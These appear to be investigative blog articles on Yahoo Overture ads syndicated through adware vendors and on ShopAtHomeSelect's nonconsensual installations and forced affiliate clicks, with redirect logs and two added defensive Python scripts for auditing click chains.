Claria’s provision of Yahoo Overture sponsored links raises clear questions of business benefit for affected advertisers. In the second screenshot at right, the user was already at the Dell.com site. (Indeed, Dell might have just paid several dollars to reach that user, via a pay-per-click ad at Yahoo, Google, or elsewhere.) Claria’s popunder risks drawing the user’s attention away from Dell — but if the user then clicks on the prominent Dell ad in Claria’s Overture listing, Dell has to pay again for the same user who was already at the Dell site. Why pay Yahoo and Claria to get the user back, when it was they who took the user from Dell in the first place?

Claria’s provision of Yahoo Overture sponsored links also presents ethical concerns. Many advertisers dislike Claria’s practices — including its aggressive methods of becoming installed on users’ PCs, its serious effects on privacy, and its harm to computer performance. Indeed, when I previously revealed that, through another channel, Dell was advertising with Claria in mid 2004, Dell staff sought to distance Dell from Claria, commenting “[T]oday we do not do business with anyone like Claria.” But despite Dell’s stated dislike of Claria, Dell does help fund Claria when Dell purchases pay-per-click ads from Yahoo: Payment flows from Dell to Yahoo to Claria, as shown in the diagram at right. Same for thousands of other Yahoo Overture advertisers.

In the future, Claria purports to plan to shut down its popup business. That’s a move I applaud — it’s been a bad business from the start. But at present Claria still serves lots of popups — including Yahoo Overture popunders as frequently as every few minutes. These ads are big money: Claria’s 2003 SEC S1 discloses receiving $31 million from Yahoo in 2003 alone — despite a relationship only in place for 9 months of that year. Annualizing the payment and taking account of the dramatic increase in pay-per-click fees, Yahoo might now be paying Claria $50 million or more per year. (It’s hard to know for sure because Claria hasn’t filed more recent financial disclosures, and Yahoo doesn’t include this level of detail in its financial reports.)

eXact Advertising – Popups and Sidebars of Yahoo Sponsored Links

A Yahoo Overture auto-opening sidebar, delivered by eXact Advertising, targeting Google search results.

Diagram: PPC advertisers → Yahoo Overture → eXact Advertising. Money flows down the chain from advertisers; ad viewers flow back up.

The money trail – how funds flow from advertisers to Yahoo Overture to eXact Advertising.

Claria claims to always install with consent — however tricky or ill-gotten, per my testing and documentation. But other Yahoo Overture syndicators can’t even make this claim. On dozens of occasions, I have observed and recorded software from eXact Advertising installed through security holes, with no notice or consent. (Some examples: 1, 2.) I’ve also seen eXact installed by tricky popups claiming to be required to view sexually-explicit videos, and by unrequested popups claiming to offer “browser enhancements.” Others have reported eXact bundled by P2P-distributed videos purporting to offer child pornography, and even by instant messenger worms. In short, when a user has software from eXact, the user is unlikely to have granted meaningful informed consent to the installation, and the user may not have granted any consent at all. Reporters tell me that eXact claims to have fixed these problems, but that’s just not true: I’ve received nonconsensual installations of eXact software this very week. Videos on file.

Despite its poor installation practices, eXact receives Overture sponsored links, shows these advertisements to users, and presumably is paid by Yahoo for doing so.

See screenshot at right, showing an eXact auto-opening sidebar that appeared as I ran a search at Google. The sidebar shows Yahoo Overture links, and clicking a link sends users to Overture and on to the advertiser (without passing through any other search intermediary). Notice the Overture reference in the browser status bar as I hold my mouse over a sponsored link.

To typical users, the eXact-delivered Yahoo Overture sidebar appears to be an integrated part of search results — presumably delivered by Google (or whatever other search engine the user had requested). Notice the absence of any distinctive branding, logo, disclosure, or other identification that the sidebar comes from eXact and Overture. To find such a disclosure, a user must scroll to the bottom of the sidebar. Even there, the disclosure is truncated and hard to read. Screenshot.

eXact’s BullsEye service also shows sponsored link listings in freestanding windows. Here too, results are obtained from Yahoo Overture. Screenshot.

Direct Revenue – Popups and Popunders of Yahoo Sponsored Links

A Yahoo Overture popunder, delivered by Direct Revenue, targeting Dell. Shown after activating the popunder.

Diagram: PPC advertisers (i.e. Dell) → Yahoo Overture → InfoSpace → Direct Revenue. Money flows down the chain from advertisers; ad viewers flow back up.

The money trail – how funds flow from advertisers to Yahoo Overture to Direct Revenue.

Direct Revenue installations are at least as poor as eXact. I have numerous videos on file showing DR installed without consent (one such video on my public site). DR also uses various other tricky methods to get installed — like tricky popups, bundles, etc. But DR is perhaps worse than other advertising software in its unusual difficulty of removal (requiring downloading a special uninstaller from DR’s web site). DR is also unusual in its ability to disable and delete other software on a user’s PC.

Despite these troubling practices, DR also shows Yahoo Overture ads. See e.g. the example ad at right. The searchblazer results appeared when I browsed to Dell.com. Notice Direct Revenue’s “Aurora” branding in the upper-left corner and title bar. Although the ad’s body lacks any Direct Revenue branding or logo, the ad was loaded from the search.offeroptimizer.com server, a server under DR’s control. (Offeroptimizer.com is a well-known DR domain.) Furthermore, clicking on a sponsored link within the ad caused traffic that first passed through search.offeroptimizer.com en route to Overture. In short, this ad is not a rogue advertiser buying traffic from Direct Revenue. Rather, these sponsored links were specifically placed by Direct Revenue itself.

When I clicked on the first sponsored link shown at right, traffic flowed as listed below. See also full packet log.

http://xadsj.offeroptimizer.com/c/click.php?c=48685&s=5261&…
http://msxml.infospace.com/_1_B2HUEF099WI63__dirrev.feed.pu1/…
http://www10.overture.com/d/sr/?xargs=…
http://landingstrip.dell.com/landingstrip/ls.asp?CID=8278&LID=230157&…

As indicated in the diagram at right and in the traffic flow above, Yahoo Overture syndicates its ads to InfoSpace, and InfoSpace in turn syndicates these ads to Direct Revenue. This series of relationships makes it particularly hard for Yahoo Overture to know where its advertisers’ ads will appear: Yahoo must count on InfoSpace to assure the quality, ethics, and compliance of InfoSpace’s partners.

This is not the first instance of InfoSpace partners with questionable practices. In June I documented Google ads syndicated to the IBIS Toolbar (also known to become installed without consent). Like Overture ads passing through InfoSpace en route to Direct Revenue, these Google ads were passed from Google to InfoSpace to IBIS.

As in the Claria examples above, Direct Revenue syndications of Yahoo Overture ads often ask advertisers to pay for visitors already at their sites. In the example above, Dell was targeted by a list of sponsored links that places Dell in both of the top two positions. If a user clicks on one of these links, Dell pays Yahoo (and ultimately Direct Revenue) for a user who was already at the Dell site. Screenshot.

180solutions – Popups of Yahoo Sponsored Links

A Yahoo Overture popup delivered by 180solutions.

Diagram: PPC advertisers (i.e. Driverloans) → Yahoo Overture → InfoSpace → 180solutions. Money flows down the chain from advertisers; ad viewers flow back up.

The money trail – how funds flow from advertisers to Yahoo Overture to 180solutions.

When I first posted this piece, I included no mention of 180solutions. My rationale: They’ve been involved in so many widely-publicized spyware scandals — from installing without consent, to installing with euphemisms (but no EULA) at kids sites, to installing at child porn sites — that undisclosed syndication of Yahoo Overture ads seemed like the least of their problems. Perhaps that’s right. But multiple readers asked me whether 180 wasn’t involved also, and why 180 wasn’t included in my write-up. So make no mistake about it: 180 shows Yahoo Overture ads too.

The screenshot at right shows a popup of Yahoo Overture ads delivered by 180solutions. In testing, I click on the ad, and traffic flows to InfoSpace, then to Overture, then to the advertiser. See traffic log below, and full packet log. See also a video of this click, showing the cookies created as a result of the click.

http://searchresults.180searchassistant.com/clicks.php?p==…
http://msxml.infospace.com/_1_YWCU9J03JUL8FV__180sol.feed/…
http://www10.overture.com/d/sr/?xargs=…
http://www.driverloans.com/app/2p1a?x=seoyahoo:value

Other Advertising Software Installed Improperly – Showing Yahoo Sponsored Links

Yahoo Overture ads in an auto-opening sidebar delivered by SideFind, showing Dell sponsored links in response to type-in requests for the Dell.com site.

Diagram: PPC advertisers (i.e. Dell) → Yahoo Overture → 81.201.104.136 → trafficengine.net → SideFind. Money flows down the chain from advertisers; ad viewers flow back up.

The money trail – how funds flow from advertisers to Yahoo Overture to SideFind.

Claria, eXact Advertising, Direct Revenue, and 180solutions are all relatively well-known programs — each installed on millions (or tens of millions) of PCs, and each backed by major investors. But Yahoo also helps to fund vendors who are far less well-known.

Earlier this summer, in the course of documenting Google funding IBIS, I also prepared detailed proof showing how Yahoo ads get syndicated to IBIS too. Video and packet logs on file.

Just this past week, I happened to test a computer infected with a variety of unwanted software (a few disclosed in license agreements; most not). I observed that traffic was sent to Yahoo from both “Slotchbar” (an unrequested toolbar added to my test PC’s browser without my consent) and “SideFind” (an auto-opening browser sidebar, also installed without consent). I have video and packet logs on file, showing these nonconsensual installations as well as their syndication of PPC advertisements from Yahoo Overture. The screenshot at right shows the auto-activating SideFind sidebar, targeting a type-in request for Dell with various sponsored links, largely pointing back to Dell.

These are just a few of the additional examples I have observed and recorded.

In some instances, Yahoo’s dealings with these smaller spyware vendors entail traffic passing through multiple levels of intermediaries. For example, when SideFind sends traffic to Yahoo Overture, the traffic passes through trafficengine.net and then through an unnamed server at IP address 81.201.104.136 (reportedly operated by Copernic/Inktomi) before reaching Overture. See diagram at right, traffic log below, and full packet log.

http://www.sidefind.com/ist/scripts/log_clicks.php?account_id=…
http://feeds.trafficengine.net/click.ashx?key=computers…
http://81.201.104.136/fast-cgi/bsc?context=redir…
http://www6.overture.com/d/sr/?xargs=…
http://landingstrip.dell.com/landingstrip/ls.asp?CID=8278…

In principle, these many levels of intermediation might make it especially hard for Yahoo to know where traffic begins. However, Yahoo ultimately has a direct relationship with some final source who sends the traffic to Yahoo. (In this example, Yahoo has a direct relationship with the operators of the 81.201.104.136 server.) So Yahoo can require that that final source take steps to keep Yahoo’s ads out of spyware. Furthermore, syndicated traffic often includes an HTTP Referer header that gives the name of the originating site. For example, in the SideFind packet log, Yahoo’s servers receive an HTTP Referer header bearing the domain name sidefind.com, making it easy for Overture to see where traffic began. With its servers specifically receiving the name and URL of the traffic’s source, Yahoo cannot claim not to know where its ads are being shown.
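The attribution argument above can be turned into a check an ad network (or an auditor with a packet log) could actually run. This is an added example, not code from the article or from any of the companies named; the hostnames in the first chain are the ones in the SideFind traffic log above, while the HTTP statuses, Referer values, the partner.example host and both lists are constructed assumptions.

```python
"""Audit syndicated PPC click chains using only what a packet log and the
ad server's own request headers expose: the hop-by-hop redirect sequence
and the HTTP Referer header.  Example code, not the article's or Yahoo's."""
from dataclasses import dataclass
from typing import Optional
from urllib.parse import urlparse


@dataclass
class Request:
    url: str
    status: int               # HTTP status returned for this request
    referer: Optional[str]    # Referer header the client sent, if any


def host_of(url: Optional[str]) -> str:
    """Lowercase hostname (or bare IP literal) of a URL; '' if none."""
    return (urlparse(url).hostname or "").lower() if url else ""


def split_chains(log):
    """Split a packet log into click chains: a run of 3xx redirects closed
    by the first non-3xx response (the landing page)."""
    chains, current = [], []
    for req in log:
        current.append(req)
        if not 300 <= req.status < 400:
            chains.append(current)
            current = []
    if current:                 # capture ended mid-chain; keep what we saw
        chains.append(current)
    return chains


def audit_chain(chain, ad_host, approved_partners, known_adware):
    """Classify one chain from the ad server's point of view.

    approved_partners: hosts allowed to send clicks directly to ad_host.
    known_adware: hosts of advertising software the network wants excluded.
    The ad server itself only sees the request addressed to it plus its
    Referer; the full hop list is what a client-side packet log adds.
    """
    hosts = [host_of(r.url) for r in chain]
    if ad_host not in hosts:
        return {"verdict": "not-syndicated", "origin": hosts[0],
                "direct_partner": None, "intermediaries": [], "landing": hosts[-1]}
    i = hosts.index(ad_host)
    direct_partner = hosts[i - 1] if i > 0 else None
    # Referer names the page that started the click; fall back to the first hop.
    origin = host_of(chain[i].referer) or (hosts[0] if i > 0 else "")
    report = {"origin": origin, "direct_partner": direct_partner,
              "intermediaries": hosts[1:i], "landing": hosts[-1]}
    if not origin:
        report["verdict"] = "unattributed"      # Referer stripped: needs manual review
    elif origin in known_adware:
        report["verdict"] = "adware-origin"     # approved partner or not, the source is adware
    elif direct_partner not in approved_partners:
        report["verdict"] = "unapproved-partner"
    else:
        report["verdict"] = "ok"
    return report


def audit_log(log, ad_host, approved_partners, known_adware):
    return [audit_chain(c, ad_host, approved_partners, known_adware)
            for c in split_chains(log)]


SIDEFIND_PAGE = "http://www.sidefind.com/"          # assumed Referer value
PARTNER_PAGE = "http://search.partner.example/results?q=computers"

# Constructed packet log.  Chain 1 mirrors the SideFind path in the article
# (statuses and Referer assumed); chain 2 is a direct click from a hypothetical
# approved search partner; chain 3 arrives at the ad server with no Referer.
SAMPLE_LOG = [
    Request("http://www.sidefind.com/ist/scripts/log_clicks.php?account_id=0", 302, SIDEFIND_PAGE),
    Request("http://feeds.trafficengine.net/click.ashx?key=computers", 302, SIDEFIND_PAGE),
    Request("http://81.201.104.136/fast-cgi/bsc?context=redir", 302, SIDEFIND_PAGE),
    Request("http://www6.overture.com/d/sr/?xargs=0", 302, SIDEFIND_PAGE),
    Request("http://landingstrip.dell.com/landingstrip/ls.asp?CID=8278", 200, SIDEFIND_PAGE),
    Request("http://search.partner.example/click?id=1", 302, PARTNER_PAGE),
    Request("http://www6.overture.com/d/sr/?xargs=1", 302, PARTNER_PAGE),
    Request("http://landingstrip.dell.com/landingstrip/ls.asp?CID=8278", 200, PARTNER_PAGE),
    Request("http://www6.overture.com/d/sr/?xargs=2", 302, None),
    Request("http://landingstrip.dell.com/landingstrip/ls.asp?CID=8278", 200, None),
]
APPROVED = {"81.201.104.136", "search.partner.example"}   # constructed direct-feed list
ADWARE = {"www.sidefind.com", "sidefind.com"}             # constructed exclusion list

if __name__ == "__main__":
    for report in audit_log(SAMPLE_LOG, "www6.overture.com", APPROVED, ADWARE):
        print(report["verdict"], "<-", report["origin"] or "(no referer)",
              "via", report["intermediaries"])
```

Note that chain 1 is flagged even though its direct partner is on the approved list: the Referer, not the immediate upstream, is what identifies where the traffic began.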

Yahoo’s Failure to Disclose

If Yahoo’s advertisers were fairly advised of Yahoo’s plan to syndicate their ads to spyware programs, Yahoo might claim to be acting solely as their agent; perhaps advertisers want to buy advertising from Claria, eXact, DR, 180, and other such vendors. But in fact Yahoo fails to tell advertisers what will occur — so Yahoo’s syndication of advertisers’ ads cannot be claimed to occur with advertisers’ authorization.

Yahoo’s marketing materials are silent on the risk of spyware syndication, even where Yahoo’s syndication relationships are large and longstanding (i.e. Claria). Within Yahoo’s marketing materials to solicit new advertisers, Yahoo’s “Publisher Network” page mentions various syndicators of Yahoo ads, but Yahoo fails to mention even a single “adware”-type program. Yahoo’s formal Advertiser Terms and Conditions doesn’t mention adware either, and this document discloses advertisement syndication only to say that Yahoo syndicates ads to “various third parties who may be authorized by Overture to make the Sponsored Listings Marketplace Results available as a link from, an add-on service to, or otherwise in connection with Third Party Products.” Yahoo defines these third-party products broadly, as “Web sites, content, applications and/or e-mails.” “Applications” alludes to spyware — but makes no mention of the specific nature of these applications, nor of the likelihood that these applications install by security exploits, trickery, or taking advantage of users’ naivete.

Only at Yahoo’s privacy page does Yahoo make specific mention of any of its advertising software syndicators. Even there, Yahoo mentions only Claria, and Yahoo calls Claria an “ad network” — without mention of its adware, its software download, and its substantial privacy consequences. Furthermore, Yahoo’s privacy page states only that Yahoo has a “relationship” with Claria — but says nothing about the nature or scope of that relationship, i.e. that Claria shows Yahoo Overture ads. In any event, advertisers are unlikely to look to a page about consumer privacy in order to learn where their ads will be shown.

Given the perceived importance and value of Yahoo’s pay-per-click advertising network, some advertisers might choose to advertise with Yahoo despite the blemish of Yahoo’s dealings with spyware companies. Others might decide not to advertise with Yahoo at all, if advertising with Yahoo necessarily entails supporting spyware. But where Yahoo fails to disclose these relationships, advertisers are denied this choice.

What Yahoo Should Do

In my view, Yahoo — and other PPC networks facing similar problems — should begin by developing and distributing clear rules for who may syndicate their ads. Last year a Yahoo spokesperson told eWeek that “Overture screens its distribution partners to make sure they gain user permission before downloading software.” “Permission” may sound clear-cut, but in practice it’s a surprisingly imprecise concept. What about “permission” obtained under false pretenses — like promising to fix a user’s clock or to improve security, but actually adding advertising software? What about “permission” obtained from a user at a kids site? What about syndicators that buy traffic from advertising software installed without consent, but that don’t make such software of their own? PPC networks need rules that speak to these situations — presumably forbidding all these methods of trickery and deception.

After clarifying their stance on spyware syndicating their ads, PPC networks need to redouble their efforts at enforcement. Tellingly, even Yahoo’s “permission” standard is violated by the frequent nonconsensual installations of Direct Revenue and eXact Advertising (links above). Nonconsensual installations of these programs are well known to those who test and study spyware, and they’re frequently reported at spyware news sites like Spyware Warrior. PPC network staff need to become familiar with these basic industry sources and testing methods, and they need to enforce their rules accordingly.

At present, Yahoo has many PPC syndicators — apparently hundreds or thousands. (Yahoo does not disclose all its syndicators.) Finding all rogue syndicators may prove hard, especially if Yahoo’s syndicators have further partners of their own (as in the Direct Revenue / InfoSpace and SideFind examples, above). In this article, I’ve focused on a few large and well-known syndicators who rely on software installed on millions of PCs, but smaller players are often harder to find and identify. Nonetheless, I’ve found dozens of rogue PPC syndicators using only a single off-the-shelf PC in my lab. (See above.) With all their resources, big PPC networks (like Yahoo) can surely do far better.

Enforcement also needs to include real penalties for those who break the rules. Merely ejecting a rogue syndicator does not deter future violations: Others see that they can make money from PPC syndication through spyware, anticipating only a slap on the wrist when these practices are discovered. A better enforcement strategy would seek to recapture fees previously paid to rogue syndicators — then refund advertisers for ads shown improperly. If a PPC network adopted this strategy and sued its rogue syndicators where necessary, other rogues would be less anxious to follow.

Beyond advertiser backlash and consumer demand, PPC networks face regulatory pressure to avoid supporting spyware through PPC syndication. For example, in the course of their investigation of Intermix, staff of the New York Attorney General revealed that Yahoo contributed 10% of Intermix’s revenue. NYAG staff say they’re “not ruling out” litigation against Yahoo for funding Intermix. More recently, rumors indicate a possible NYAG investigation of Direct Revenue. Given Yahoo’s past support for Intermix, I wonder how NYAG will react to seeing Yahoo funding Direct Revenue too.

If a PPC network can’t or won’t eliminate rogue syndicators, it could at least grant advertisers the ability to opt out of particular unwanted syndications. Others have offered this suggestion on various occasions (e.g. Kraft seeking to avoid syndicating its ads to white supremacy groups), as to both Yahoo Overture and Google. Affiliate networks all offer this level of granularity — letting each affiliate merchant decide what affiliates may earn fees for promoting it. But to my knowledge, no major PPC search engine offers this level of advertiser control.

Ultimately, PPC syndication offers savvy PPC networks a valuable opportunity — a chance to lead industry efforts to stop the spread of unwanted advertising software. Earlier this week, Azoogle launched its new “MPORT” network with the promise of keeping the network entirely adware-free. With a bit of effort and a renewed commitment to stopping spyware, Yahoo could bring MPORT’s no-adware benefit to Overture advertisers too.

Debunking ShopAtHomeSelect updated October 14, 2005

Reading ShopAtHomeSelect’s marketing materials, their advertising software might seem to present compelling benefits. SAHS promises users rebates on products they’re already purchasing. And SAHS even offers reminder software to make sure forgetful users don’t miss out on the savings. What could be better than timely reminders of free money?

But the SAHS site doesn’t tell the whole story. My testing demonstrates that SAHS software is often installed without users wanting it, requesting it, or even accepting it. (Details.) When users receive an unwanted SAHS installation, SAHS still claims commissions on users’ purchases — but typical users will never see a penny of the proceeds. (Details.) Meanwhile, whether requested by users or not, SAHS’s commission-claiming practices seem to violate stated rules of affiliate networks. (Details.)

Despite these serious problems, SAHS boasts a superstar list of clients — the biggest merchants at all the major affiliate networks, including Dell, Buy.com, Expedia, Gap, and Apple. Why? Affiliate networks have little incentive to investigate SAHS’s practices or assure compliance with stated rules. (Details.) SAHS and affiliate networks profit, but users and merchants are left as victims. (Details.)

Update (October 14): Commission Junction has removed SAHS from its network, thereby ending SAHS’s relationships with all CJ merchants. No word on similar actions by LinkShare or Performics.

Wrongful Installations – No Consent, and Tricky So-Called “Consent”

ShopAtHomeSelect is widely known to become installed without meaningful consent — or, in many cases, without any consent at all. Most egregious are installations through security exploits, without any notice or consent. I continually test these installations in my lab, and I have repeatedly observed SAHS appearing unrequested — more than half a dozen such installs, occurring on distinct sites on distinct days. I posted one such video in May, and I retain the others on file.

3D Screensaver installs SAHS, although the 3D license does not disclose inclusion of SAHS.

SAHS’s improper installations extend to many of SAHS’s bundling partners. I have repeatedly seen (and often recorded) SAHS disclosed midway through lengthy license agreements; users often have to scroll through dozens of pages to learn of SAHS’s inclusion. Even worse, some programs that bundle SAHS nonetheless fail to mention SAHS’s inclusion. See e.g. 3D Flying Icons, which shows a 12-page 2,286-word license that makes no mention of SAHS, yet 3D installs SAHS anyway. (Screenshot at right.)

PacerD installs SAHS, although the PacerD EULA does not disclose inclusion of SAHS.

In other instances, ActiveX popups pressure users to accept multiple advertising programs in the guise of “browser enhancements” (or similar). In February 2005, I observed an ActiveX popup that labeled itself “website access” and “click yes to continue,” but immediately installed SAHS if users pressed yes once. More recently, I posted an analysis of the PacerD ActiveX. (Screenshot at left.) PacerD’s ActiveX popup links to a license agreement which discloses installation of eight advertising programs — but doesn’t mention SAHS, though Pacer in fact does install SAHS. So even when careful users take the time to examine Pacer’s 1,951-word license, in hopes of learning what they’re getting, there’s no way to learn that SAHS will be installed, not to mention grant or deny consent.

A porn video distributed by BitTorrent (P2P) installs SAHS. Disclosure occurs only if users scroll down several pages in the video’s EULA. Disclosure consists of only a single sentence, without even a link to more information.

I’m not the only observer to notice SAHS installed improperly. Earlier this month, VitalSecurity.org reported SAHS installed via IM spam: Users receive an unsolicited instant message, and clicking the message’s link installs SAHS (among other programs) without any notice or consent. Last month, PC Pitstop (1, 2) and VitalSecurity.org reported SAHS bundled with porn videos distributed by BitTorrent — so a user seeking adult entertainment would unwittingly receive SAHS too. In my testing of these BitTorrent videos, SAHS was listed in a license agreement preceding the videos, but users had to scroll past four pages of other text to learn of SAHS’s inclusion, and even then SAHS’s mention was only a single sentence — without even a link to an external SAHS license agreement, and without any description of the privacy effects of installing SAHS software. (See screenshot at right.) Furthermore, these BitTorrent videos aren’t SAHS’s only tie to porn videos. In January, I analyzed ActiveX popups triggered by porn videos. These popups falsely claimed to be required to view the videos, but in fact they were mere ploys seeking to install SAHS and other advertising software.

In short, a user receiving SAHS cannot reasonably be claimed to have wanted SAHS, nor to have granted informed consent. Perhaps some SAHS users run SAHS willingly and knowingly, but many clearly do not.

In contrast, affiliate networks’ rules set a high burden for installation disclosure and consent. LinkShare’s Shopping Technologies Addendum (PDF) requires that disclosure be “full and prominent,” a standard met neither by SAHS’s nonconsensual installations, nor by its installation when bundled with porn videos. Commission Junction’s Publisher Code of Conduct requires that disclosure be “clearly presented to and accepted by” users, and CJ specifically prohibits software that is “installed invisibly” (as in the nonconsensual installations detailed above).

SAHS may claim that these wrongful installations have stopped. But that’s just not credible. I’ve continued to see (and record) these installations as recently as the past few days.

SAHS may say these wrongful installations are the fault of its distributors. (SAHS offered that argument when PC Pitstop inquired as to SAHS bundling with porn videos.) But affiliate networks’ rules do not forgive wrongful installations merely because the installations were performed by others. To the contrary, affiliate networks set out high consent requirements which apply no matter who installs the software. Furthermore, with so many diverse wrongful installations over such an extended period, it’s clear that something is fundamentally wrong with SAHS’s installation methods; SAHS can’t escape responsibility by vague finger-pointing.

Update (September 9): Staff from SAHS have prepared a document (PDF) purporting to rebut my findings of nonconsensual and dubious installations of SAHS. In each instance, SAHS claims they weren’t really installed in the manner I describe, so they say I am “mistaken” as to my allegations. Let’s look at each of the types of installations I described, and review the evidence:

Tricky popups (PacerD specifically): I previously posted an analysis of PacerD’s installation, including a screenshot of new folders created by PacerD. SAHS correctly notes that there’s no new folder containing SAHS files. But the lack of a new Program Files folder doesn’t mean SAHS wasn’t installed; quite the contrary, SAHS was installed by PacerD. Furthermore, SAHS was installed into the c:\Windows directory, where inexperienced users are unlikely to look for it, and where its files tend to become jumbled with other files. To document this installation, I have added two new screenshots to my SAHS write-up, showing newly-created SAHS files placed in my c:\Windows directory. I also have on file a video, showing the installation of the PacerD ActiveX followed (without interruption in the video) by the creation of these files. I also have on file a packet log indicating the newly-installed copy of SAHS contacting SAHS servers. So my initial write-up was right and SAHS’s response is wrong: PacerD did indeed install SAHS — and it did so without mentioning SAHS in any EULA or other disclosure.

Large bundles with little or no disclosure (3D Flying Icons specifically): Here again, SAHS makes the same analytical error. My write-up reports lots of new folders (within c:\Program Files) reflecting other programs becoming installed. SAHS didn’t add a folder to c:\Program Files, so it didn’t come up in my Program Files screenshots. But SAHS absolutely was installed by 3D. In a video I made at the time (now also posted to my public site), I observed a SAHS installer created in c:\Temp (1:44), and I saw SAHS program files in c:\Windows at 2:43, in each instance bearing distinctive SAHS icons as well as typical SAHS filenames. So there can be no disputing that 3D installs SAHS.

Nonconsensual installations through security holes: The section above links to a particular single security exploit video, one of literally scores I have on file. My automated network log analysis, file-change, and registry-change analysis confirm that SAHS was installed in the course of that security exploit, and Ad-Aware logs say the same, but the video does not specifically show the installation. That’s not particularly surprising — SAHS installs can be silent, and I wasn’t specifically seeking to document SAHS installs when I made that video. But rather than worry about this single example from so many months back, let me take this opportunity to post a recent example, showing a nonconsensual SAHS installation I happened to receive just last month (August 2005). In this video, I view a page at highconvert.com (video at 0:05), receive a series of security exploits (0:20-0:30), browse my file system and diagnostic tools, and then get a popup indicating that SAHS has been installed (1:57) (screenshot). My packet log and change-logs also confirm the SAHS installation.

So where does this leave my claims of improper SAHS installations? Notwithstanding SAHS’s promises of legitimacy, there can be no doubt of SAHS becoming installed without consent. SAHS may not like to admit it, and SAHS produces intense rhetoric to deny it, but users with SAHS aren’t all “opt-in.” To the contrary, some SAHS users have SAHS just because they’re unlucky enough to get it foisted upon them. And contrary to SAHS’s claim that my findings are “incorrect,” I have ample proof of these nonconsensual SAHS installs.


Wrongful Operation – Forced Clicks

In addition to regulating installation methods, affiliate networks’ rules limit the ways in which affiliates may claim affiliate commissions. Commission Junction’s Publisher Code of Conduct prohibits claiming commissions on “non-end-user initiated events” — invoking affiliate links without an “affirmative end-user action.” LinkShare’s Shopping Technologies Addendum (PDF) lacks a corresponding prohibition of non-end-user initiated events, but LinkShare’s Affiliate Membership Agreement repeatedly calls for affirmative user actions as a necessary condition to earning commission. For example, LinkShare’s provision 1.1 says commissions are payable only for “users who activate the hyperlink” (emphasis added); the “users … activate” wording specifically contemplates a user taking an affirmative action, not merely a software program automatically opening a link. (Since LinkShare’s special Addendum lacks any provision to the contrary, these Agreement terms still apply.)

There are good reasons for these rules: Affiliate merchants often make substantial payments if an affiliate link is activated and a user makes a purchase. (For example, Dell could easily pay $10+ for a single purchase through a single link.) So software programs aren’t allowed to “click” on affiliate links automatically. Instead, users must actually show some interest in the links — protecting merchants from being asked to pay commissions when an affiliate did nothing to earn a fee.

Although applicable network rules require that clicks on affiliate links be affirmative and that such clicks actually be performed by users (not just by software), SAHS software opens affiliate links and claims commissions without users taking any specific action. See e.g. this SAHS-Dell video, showing a user requesting www.dell.com on a computer with SAHS installed. SAHS immediately redirects the user to its affiliate link to Dell (video at 0:06), and LinkShare affiliate cookies are created (0:08), all without a user affirmatively clicking on any SAHS affiliate link. See also a corresponding SAHS video for Buy.com, showing affiliate link being loaded (0:06) and cookies created (0:10), again without any user interaction.

So SAHS’s operation constitutes an apparent violation of applicable network rules: it claims affiliate commissions without the required affirmative user click on an affiliate link.
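The forced-click pattern described above (a user’s direct request for a merchant, followed within a fraction of a second by an affiliate-tracker hit that no user clicked, then the merchant page loaded with the tracker as referer) leaves a recognizable trace in proxy logs. The script below is an added example, not code from this page or from any affiliate network; the log format, the tracker host affiliate-tracker.example, its “mid” parameter, and the sample log lines are all constructed assumptions.

```python
"""Flag affiliate-tracker hits that follow a direct merchant request with
no publisher page in between ("forced clicks"). Formats are assumed."""
from datetime import datetime, timedelta
from urllib.parse import urlparse, parse_qs

# Constructed assumptions: one affiliate-tracking host whose links name the
# destination merchant in a "mid" query parameter.
TRACKER_HOST = "affiliate-tracker.example"
MERCHANTS = {"dell": "www.dell.com", "buy": "www.buy.com"}
WINDOW = timedelta(seconds=2)  # a person rarely types a URL, then clicks a link, this fast

# Constructed proxy-log lines: timestamp, method, URL, referer ("-" = none).
# First block: the forced-click pattern. Second block: a genuine click from a coupon page.
SAMPLE_LOG = """\
2005-09-01T10:00:00.000 GET http://www.dell.com/ -
2005-09-01T10:00:00.130 GET http://affiliate-tracker.example/click?mid=dell&id=PUB123 -
2005-09-01T10:00:00.400 GET http://www.dell.com/?affsrc=PUB123 http://affiliate-tracker.example/click?mid=dell&id=PUB123
2005-09-01T10:05:00.000 GET http://coupons.example/deals -
2005-09-01T10:05:12.000 GET http://affiliate-tracker.example/click?mid=buy&id=PUB123 http://coupons.example/deals
2005-09-01T10:05:12.300 GET http://www.buy.com/?affsrc=PUB123 http://affiliate-tracker.example/click?mid=buy&id=PUB123
"""

def parse_line(line):
    ts, method, url, referer = line.split()
    return {"ts": datetime.fromisoformat(ts), "method": method,
            "url": url, "referer": None if referer == "-" else referer}

def host(url):
    return urlparse(url).netloc.lower()

def tracker_merchant(url):
    """Return the merchant host a tracker link points at, or None if not a tracker URL."""
    if host(url) != TRACKER_HOST:
        return None
    mid = parse_qs(urlparse(url).query).get("mid", [None])[0]
    return MERCHANTS.get(mid)

def find_forced_clicks(lines):
    """Return (merchant_request_time, tracker_url) pairs that look like forced clicks."""
    events = [parse_line(l) for l in lines if l.strip()]
    flagged = []
    for i, ev in enumerate(events):
        merchant = tracker_merchant(ev["url"])
        if merchant is None:
            continue
        # A genuine affiliate click arrives from a publisher page, so its referer is
        # some third-party site. No referer, or a referer on the merchant itself,
        # means no publisher page the user was reading triggered the link.
        ref_host = host(ev["referer"]) if ev["referer"] else None
        if ref_host and ref_host not in (merchant, TRACKER_HOST):
            continue
        # Look back for a direct (referer-less) request to that same merchant just before.
        for prev in reversed(events[:i]):
            if ev["ts"] - prev["ts"] > WINDOW:
                break
            if host(prev["url"]) == merchant and prev["referer"] is None:
                flagged.append((prev["ts"].isoformat(), ev["url"]))
                break
    return flagged
```

Run over a real proxy log, the same heuristic would need the actual tracker hosts and merchant-identifying parameters of the networks in use; the structure of the check (merchant request, then tracker, with no publisher page in between) is what carries over.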

Affiliate Networks’ Motives

I began this piece with the claim that affiliate networks have allowed SAHS to remain in their networks, notwithstanding the violations set out above. Why?

One possibility is that the affiliate networks simply never noticed the violations. But that’s a suggestion I can’t accept. Consider the many articles above, each reporting wrongful installations. Much of this work received extensive media coverage, including discussions on industry sites of record. Furthermore, most of these findings can be verified easily using any ordinary PC. So affiliate networks can’t credibly claim ignorance of what was occurring.

